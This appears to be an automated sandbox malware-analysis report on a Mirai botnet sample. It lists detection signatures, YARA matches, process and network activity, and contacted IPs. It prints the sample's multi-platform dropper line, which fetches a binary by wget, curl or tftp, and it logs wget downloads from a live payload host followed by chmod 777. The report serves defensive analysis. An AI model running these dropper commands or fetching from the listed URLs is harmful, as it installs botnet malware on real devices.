Linux Analysis Report

Overview

General Information

Analysis ID: 1417428
Infos:

Detection

Mirai
Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Mirai
Sample deletes itself
Detected TCP or UDP traffic on non-standard ports
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus detection for dropped file
Source: /tmp/system Avira: detection malicious, Label: EXP/ELF.Agent.J.8
Found strings indicative of a multi-platform dropper
Source: shk.14.dr String: cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
Source: system.24.dr String: /system/proc/self/exe/proc/proc//cmdlineld.sowgettftpcurl/exe
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:36034 -> 185.224.128.34:33335
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 6213) Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk Jump to behavior
Source: /bin/sh (PID: 6219) Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system Jump to behavior
Sample listens on a socket
Source: /tmp/system (PID: 6221) Socket: 127.0.0.1::33337 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 106.148.45.41
Source: unknown TCP traffic detected without corresponding DNS query: 200.149.252.41
Source: unknown TCP traffic detected without corresponding DNS query: 223.68.120.41
Source: unknown TCP traffic detected without corresponding DNS query: 150.96.78.16
Source: unknown TCP traffic detected without corresponding DNS query: 78.62.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 249.225.40.54
Source: unknown TCP traffic detected without corresponding DNS query: 137.203.160.108
Source: unknown TCP traffic detected without corresponding DNS query: 32.142.109.173
Source: unknown TCP traffic detected without corresponding DNS query: 129.109.37.211
Source: unknown TCP traffic detected without corresponding DNS query: 12.61.57.1
Source: unknown TCP traffic detected without corresponding DNS query: 143.102.55.216
Source: unknown TCP traffic detected without corresponding DNS query: 85.108.69.44
Source: unknown TCP traffic detected without corresponding DNS query: 51.207.27.93
Source: unknown TCP traffic detected without corresponding DNS query: 106.188.187.62
Source: unknown TCP traffic detected without corresponding DNS query: 108.84.81.58
Source: unknown TCP traffic detected without corresponding DNS query: 77.185.84.58
Source: unknown TCP traffic detected without corresponding DNS query: 249.76.250.189
Source: unknown TCP traffic detected without corresponding DNS query: 199.15.94.9
Source: unknown TCP traffic detected without corresponding DNS query: 136.7.114.33
Source: unknown TCP traffic detected without corresponding DNS query: 25.75.3.40
Source: unknown TCP traffic detected without corresponding DNS query: 246.184.16.162
Source: unknown TCP traffic detected without corresponding DNS query: 109.172.227.147
Source: unknown TCP traffic detected without corresponding DNS query: 25.90.213.142
Source: unknown TCP traffic detected without corresponding DNS query: 205.200.24.255
Source: unknown TCP traffic detected without corresponding DNS query: 71.24.26.169
Source: unknown TCP traffic detected without corresponding DNS query: 135.152.8.218
Source: unknown TCP traffic detected without corresponding DNS query: 118.3.19.175
Source: unknown TCP traffic detected without corresponding DNS query: 76.149.240.145
Source: unknown TCP traffic detected without corresponding DNS query: 164.245.75.94
Source: unknown TCP traffic detected without corresponding DNS query: 133.165.237.162
Source: unknown TCP traffic detected without corresponding DNS query: 191.134.200.230
Source: unknown TCP traffic detected without corresponding DNS query: 20.149.69.44
Source: unknown TCP traffic detected without corresponding DNS query: 245.180.32.248
Source: unknown TCP traffic detected without corresponding DNS query: 63.188.242.150
Source: unknown TCP traffic detected without corresponding DNS query: 155.149.137.144
Source: unknown TCP traffic detected without corresponding DNS query: 254.101.85.223
Source: unknown TCP traffic detected without corresponding DNS query: 215.227.236.246
Source: unknown TCP traffic detected without corresponding DNS query: 79.94.26.119
Source: unknown TCP traffic detected without corresponding DNS query: 46.75.183.200
Source: unknown TCP traffic detected without corresponding DNS query: 97.243.62.227
Source: unknown TCP traffic detected without corresponding DNS query: 205.59.146.130
Source: unknown TCP traffic detected without corresponding DNS query: 195.182.43.120
Source: unknown TCP traffic detected without corresponding DNS query: 246.146.104.30
Source: unknown TCP traffic detected without corresponding DNS query: 41.171.76.135
Source: unknown TCP traffic detected without corresponding DNS query: 141.37.74.243
Source: unknown TCP traffic detected without corresponding DNS query: 33.86.44.99
Source: unknown TCP traffic detected without corresponding DNS query: 89.254.150.24
Source: unknown TCP traffic detected without corresponding DNS query: 35.118.4.255
Source: unknown TCP traffic detected without corresponding DNS query: 68.38.166.33
Source: unknown TCP traffic detected without corresponding DNS query: 162.66.218.70
Source: global traffic HTTP traffic detected: GET /shk HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: rooty.cc
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39250
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39250 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: /tmp/system, type: DROPPED Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Sample tries to kill a process (SIGKILL)
Source: /tmp/system (PID: 6225) SIGKILL sent: pid: 6223, result: successful Jump to behavior
Source: /tmp/system (PID: 6225) SIGKILL sent: pid: 6227, result: successful Jump to behavior
Source: /tmp/system (PID: 6225) SIGKILL sent: pid: -6225, result: unknown Jump to behavior
Yara signature match
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: /tmp/system, type: DROPPED Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: classification engine Classification label: mal68.troj.evad.lin@0/2@1/0
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 6215) Chmod executable: /usr/bin/chmod -> chmod 777 shk Jump to behavior
Source: /bin/sh (PID: 6220) Chmod executable: /usr/bin/chmod -> chmod 777 system Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 6212) Rm executable: /usr/bin/rm -> rm -rf shk Jump to behavior
Source: /bin/sh (PID: 6217) Rm executable: /usr/bin/rm -> rm -rf system Jump to behavior
Source: /bin/sh (PID: 6218) Rm executable: /usr/bin/rm -> rm -rf mips Jump to behavior
Source: /bin/sh (PID: 6233) Rm executable: /usr/bin/rm -> rm -rf system Jump to behavior
Source: /bin/sh (PID: 6234) Rm executable: /usr/bin/rm -> rm -rf shk Jump to behavior
Source: /usr/bin/dash (PID: 6298) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby Jump to behavior
Source: /usr/bin/dash (PID: 6299) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby Jump to behavior
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 6213) Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk Jump to behavior
Source: /bin/sh (PID: 6219) Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 6215) File: /tmp/shk (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6220) File: /tmp/system (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Sets full permissions to files and/or directories
Source: /bin/sh (PID: 6215) Chmod executable with 777: /usr/bin/chmod -> chmod 777 shk Jump to behavior
Source: /bin/sh (PID: 6220) Chmod executable with 777: /usr/bin/chmod -> chmod 777 system Jump to behavior
Writes ELF files to disk
Source: /usr/bin/wget (PID: 6219) File written: /tmp/system Jump to dropped file
Source: submitted sample Stderr: --2024-03-29 09:24:47-- http://185.224.128.34/shkConnecting to 185.224.128.34:80... connected.HTTP request sent, awaiting response... 200 OKLength: 477Saving to: shk 0K 100% 625K=0.001s2024-03-29 09:24:47 (625 KB/s) - shk saved [477/477]--2024-03-29 09:24:47-- http://185.224.128.34/mipsConnecting to 185.224.128.34:80... connected.HTTP request sent, awaiting response... 200 OKLength: 71788 (70K)Saving to: system 0K .......... .......... .......... .......... .......... 71% 141K 0s 50K .......... .......... 100% 543K=0.4s2024-03-29 09:24:48 (179 KB/s) - system saved [71788/71788]: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 6217) File: /tmp/system Jump to behavior
Source: /usr/bin/rm (PID: 6233) File: /tmp/system Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/system (PID: 6221) Queries kernel information via 'uname': Jump to behavior
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips./systemtplinkSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./system

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: /tmp/system, type: DROPPED

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match File source: /tmp/system, type: DROPPED
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
25.186.29.17
 unknown United Kingdom
7922 COMCAST-7922US false
107.212.160.104
 unknown United States
7018 ATT-INTERNET4US false
117.91.172.124
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
142.155.153.213
 unknown Canada
26677 ORION-ASNCA false
214.19.20.100
 unknown United States
367 DNIC-ASBLK-00306-00371US false
118.3.19.175
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
98.168.167.168
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
20.149.69.44
 unknown United States
4237 CSC-IGN-FTWUS false
253.128.244.98
 unknown Reserved
unknown unknown false
112.137.186.237
 unknown Japan 23637 BI-CDN-IXEquinixJpapanEnterpriseKKJP false
64.19.147.27
 unknown United States
7078 MONMOUTHUS false
140.45.6.27
 unknown United States
668 DNIC-AS-00668US false
196.174.184.99
 unknown Ghana
37140 zain-asGH false
159.232.171.75
 unknown Switzerland
13188 TRIOLANUA false
178.19.54.207
 unknown Iceland
44735 SIP-ASNIS false
170.150.164.106
 unknown Brazil
28130 CERTTOTELECOMUNICACOESLTDAEPPBR false
205.59.146.130
 unknown United States
647 DNIC-ASBLK-00616-00665US false
138.105.211.235
 unknown United States
4637 ASN-TELSTRA-GLOBALTelstraGlobalHK false
27.123.186.212
 unknown Fiji
38442 VODAFONEFIJI-AS-FJVodafoneFijiLimitedFJ false
149.127.94.136
 unknown United States
174 COGENT-174US false
16.0.75.111
 unknown United States
unknown unknown false
162.66.218.70
 unknown United States
35893 ACPCA false
245.180.32.248
 unknown Reserved
unknown unknown false
254.101.85.223
 unknown Reserved
unknown unknown false
246.184.16.162
 unknown Reserved
unknown unknown false
102.221.5.1
 unknown unknown
36926 CKL1-ASNKE false
145.146.246.103
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
52.186.157.23
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
151.54.223.95
 unknown Italy
1267 ASN-WINDTREIUNETEU false
86.251.101.150
 unknown France
3215 FranceTelecom-OrangeFR false
138.231.213.68
 unknown France
2426 FR-RENATER-RUBISRUBISMetropolitanAreaNetworkEU false
35.118.4.255
 unknown United States
237 MERIT-AS-14US false
133.165.237.162
 unknown Japan 11363 FUJITSU-USAUS false
19.196.210.101
 unknown United States
3 MIT-GATEWAYSUS false
136.164.80.135
 unknown Norway
42175 STAOIL-ASNO false
247.250.115.207
 unknown Reserved
unknown unknown false
115.117.247.27
 unknown India
4755 TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISP false
130.74.148.203
 unknown United States
25656 OLEMISSSUS false
12.32.11.133
 unknown United States
7018 ATT-INTERNET4US false
92.176.250.51
 unknown France
12479 UNI2-ASES false
136.166.243.129
 unknown United States
53380 LGCNS-ASUS false
206.177.112.156
 unknown Canada
11736 USDUS false
151.250.138.254
 unknown Turkey
34984 TELLCOM-ASTR false
39.235.255.226
 unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
129.134.47.150
 unknown United States
32934 FACEBOOKUS false
174.128.255.203
 unknown United States
46844 ST-BGPUS false
161.224.204.232
 unknown United States
396269 BPL-ASNUS false
191.134.200.230
 unknown Brazil
26615 TIMSABR false
77.150.114.125
 unknown France
15557 LDCOMNETFR false
109.39.218.145
 unknown Netherlands
15480 VFNL-ASVodafoneNLAutonomousSystemNL false
178.166.232.106
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
242.4.139.255
 unknown Reserved
unknown unknown false
146.166.141.218
 unknown United States
14977 STATE-OF-WYOMING-ASNUS false
87.88.109.146
 unknown France
5410 BOUYGTEL-ISPFR false
41.171.76.135
 unknown South Africa
36937 Neotel-ASZA false
211.38.62.100
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
28.237.108.227
 unknown United States
7922 COMCAST-7922US false
98.238.55.232
 unknown United States
7922 COMCAST-7922US false
21.46.80.3
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
131.69.86.207
 unknown United States
138 DNIC-AS-00138US false
75.23.105.155
 unknown United States
7018 ATT-INTERNET4US false
146.156.8.212
 unknown United States
197938 TRAVIANGAMESDE false
123.252.186.59
 unknown India
134540 TTML-AS-APTataTeleservicesMaharashtraLtdIN false
109.172.227.147
 unknown Georgia
16010 MAGTICOMASCaucasus-OnlineGE false
149.154.18.100
 unknown United States
43074 KLASIE false
65.9.99.136
 unknown United States
16509 AMAZON-02US false
218.139.43.107
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
251.101.67.12
 unknown Reserved
unknown unknown false
70.42.217.2
 unknown United States
10910 INTERNAP-BLKUS false
145.4.180.30
 unknown Netherlands
702 UUNETUS false
89.254.150.24
 unknown Latvia
41563 OST-ASOSTKOMSIALV false
205.126.159.56
 unknown United States
210 WEST-NET-WESTUS false
164.245.75.94
 unknown United States
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
57.10.226.162
 unknown Belgium
2686 ATGS-MMD-ASUS false
118.251.90.41
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
117.126.202.87
 unknown China
7641 CHINABTNChinaBroadcastingTVNetCN false
112.242.151.31
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
135.152.8.218
 unknown United States
14962 NCR-252US false
41.74.231.222
 unknown unknown
37235 MimecastSAZA false
148.142.94.12
 unknown United States
20004 MISOUS false
174.72.38.255
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
63.188.242.150
 unknown United States
1239 SPRINTLINKUS false
101.152.10.92
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
200.191.187.94
 unknown Brazil
4230 CLAROSABR false
148.22.240.59
 unknown United States
6400 CompaniaDominicanadeTelefonosSADO false
154.72.132.115
 unknown Cameroon
15964 CAMNET-ASCM false
69.240.239.149
 unknown United States
7922 COMCAST-7922US false
37.172.212.192
 unknown France
51207 FREEMFR false
246.57.245.181
 unknown Reserved
unknown unknown false
54.171.230.55
 unknown United States
16509 AMAZON-02US false
46.251.115.179
 unknown Cyprus
35432 CABLENET-ASCY false
214.218.60.119
 unknown United States
721 DNIC-ASBLK-00721-00726US false
69.154.33.206
 unknown United States
7018 ATT-INTERNET4US false
12.61.57.1
 unknown United States
7018 ATT-INTERNET4US false
207.52.85.53
 unknown United States
1239 SPRINTLINKUS false
21.150.40.24
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
106.147.219.116
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
150.96.78.16
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
186.245.163.63
 unknown Brazil
7738 TelemarNorteLesteSABR false
77.82.180.107
 unknown Russian Federation
12389 ROSTELECOM-ASRU false

Contacted Domains

Name IP Active
rooty.cc 185.224.128.34 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.224.128.34/mips false
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://185.224.128.34/shk false
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown